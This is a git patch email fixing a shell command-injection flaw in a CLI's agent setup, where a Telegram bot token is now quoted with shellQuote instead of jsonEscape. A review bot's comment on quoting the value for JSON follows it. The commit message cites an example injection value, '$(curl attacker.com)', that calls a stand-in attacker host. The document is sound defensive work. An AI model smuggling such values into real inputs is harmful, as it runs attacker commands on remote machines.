From 370afb631c755ca2a0adc4e018442741faf5efbb Mon Sep 17 00:00:00 2001
From: A <258483684+la14-1@users.noreply.github.com>
Date: Thu, 12 Mar 2026 22:51:33 -0700
Subject: [PATCH] security: use shellQuote for Telegram bot token in shell command (#2561)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

jsonEscape() produces double-quoted strings ("value") which allow shell command substitution $(...) inside bash. A malicious TELEGRAM_BOT_TOKEN like "$(curl attacker.com)" would execute on the remote VM when openclaw config is set.

shellQuote() uses POSIX single-quote escaping which prevents all shell expansion. Every other user-supplied value in agent-setup.ts (GITHUB_TOKEN, git user.name, git user.email) correctly uses shellQuote — the bot token was the only exception.

Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5
---
 packages/cli/src/shared/agent-setup.ts | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/packages/cli/src/shared/agent-setup.ts b/packages/cli/src/shared/agent-setup.ts
index eafbf6b9..4c56e71b 100644
--- a/packages/cli/src/shared/agent-setup.ts
+++ b/packages/cli/src/shared/agent-setup.ts
@@ -378,7 +378,7 @@ async function setupOpenclawConfig(
 const trimmedToken = envToken?.trim() || (await prompt("Telegram bot token: ")).trim();
 if (trimmedToken) {
-const escapedBotToken = jsonEscape(trimmedToken);
+const escapedBotToken = shellQuote(trimmedToken);
 const telegramResult = await asyncTryCatchIf(isOperationalError, () =>
 runner.runServer(
 "export PATH=$HOME/.npm-global/bin:$HOME/.bun/bin:$HOME/.local/bin:$PATH; " +
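Review bot: The consumer of `escapedBotToken` lies outside the hunk, and the change swaps a double-quoted JSON literal for a single-quoted shell word, so the command template that interpolates it must neither add its own quotes around the value nor rely on the argument arriving as JSON — if the old `"value"` form was feeding a `config set` that parses its argument as a JSON string, the bare word `shellQuote` now yields may be rejected or stored differently, and the correct composition there would be `shellQuote(jsonEscape(trimmedToken))` (shell-quote the outer layer, JSON-encode the inner one), which still blocks `$(...)` expansion. Please confirm against the lines following the hunk which of the two the remote command expects; I cannot tell from the hunk alone. The binding name no longer matches its content, so `const quotedBotToken = shellQuote(trimmedToken);` would stop readers from assuming JSON escaping still happens. The body of setupOpenclawConfig starts and continues outside the hunk on both sides, including the `runner.runServer(` call whose argument string is cut off at the last context line.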